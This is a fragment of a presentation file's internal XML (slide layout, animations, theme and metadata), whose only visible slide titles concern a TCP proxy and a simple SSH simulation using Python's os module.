            <a:ext cx="10850245" cy="3643630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652769" y="391945"/>
            <a:ext cx="2595152" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:blipFill>
                  <a:blip r:embed="rId4"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:blipFill>
                  <a:blip r:embed="rId4"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:blipFill>
                <a:blip r:embed="rId4"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </a:blipFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
      <p:transition p14:dur="9"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35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01029 2.22222E-6 L -0.09674 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5352" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01094 2.22222E-6 L -2.5E-6 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-547" y="0"/>
                                    </p:animMotion>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P spid="36" grpId="2"/>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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="177800"/>
            <a:ext cx="9484360" cy="701040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"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简单模拟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"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SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"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（利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"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os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"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模块使用的函数）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000"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2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="72390" y="878840"/>
            <a:ext cx="6448425" cy="2887345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6688455" y="898525"/>
            <a:ext cx="5340985" cy="2847975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="3941445"/>
            <a:ext cx="6247130" cy="2723515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6688455" y="4046855"/>
            <a:ext cx="5340985" cy="5772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75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75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theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="木先生iPPT">
  <a:themeElements>
    <a:clrScheme name="自定义 14EQWEQWE2Q">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="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华文细黑">
      <a:majorFont>
        <a:latin typeface="华文细黑"/>
        <a:ea typeface="华文细黑"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="华文细黑"/>
        <a:ea typeface="华文细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50000">
              <a:schemeClr val="bg1">
                <a:alpha val="80000"/>
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="0">
              <a:schemeClr val="bg1">
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="BFBFBF">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect t="100000" r="100000"/>
          </a:path>
          <a:tileRect l="-100000" b="-100000"/>
        </a:gradFill>
        <a:ln w="19050">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="571500" dist="508000" dir="8100000" algn="tr" rotWithShape="0">
            <a:prstClr val="black">
              <a:alpha val="20000"/>
            </a:prstClr>
          </a:outerShdw>
        </a:effectLst>
      </a:spPr>
      <a:bodyPr lIns="36000" tIns="36000" rIns="36000" bIns="36000" rtlCol="0" anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr kumimoji="1" sz="9600" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="41AAD5"/>
            </a:solidFill>
            <a:effectLst>
              <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                <a:prstClr val="black">
                  <a:alpha val="30000"/>
                </a:prstClr>
              </a:innerShdw>
            </a:effectLst>
            <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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prstDash val="lgDash"/>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3513</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>283</Paragraphs>
  <Slides>27</Slides>
  <Notes>27</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>1</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27</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="43" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>华文细黑</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>ITC Avant Garde Std XLt</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>方正兰亭细黑_GBK_M</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>华康少女文字W5(P)</vt:lpstr>
      <vt:lpstr>Yu Gothic UI Light</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>木先生iPPT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木先生</dc:creator>
  <cp:lastModifiedBy>琳</cp:lastModifiedBy>
  <cp:revision>251</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-02T07:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-09T04:40:33Z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2052-10.1.0.6391</vt:lpwstr>
  </property>
</Properties>
</file>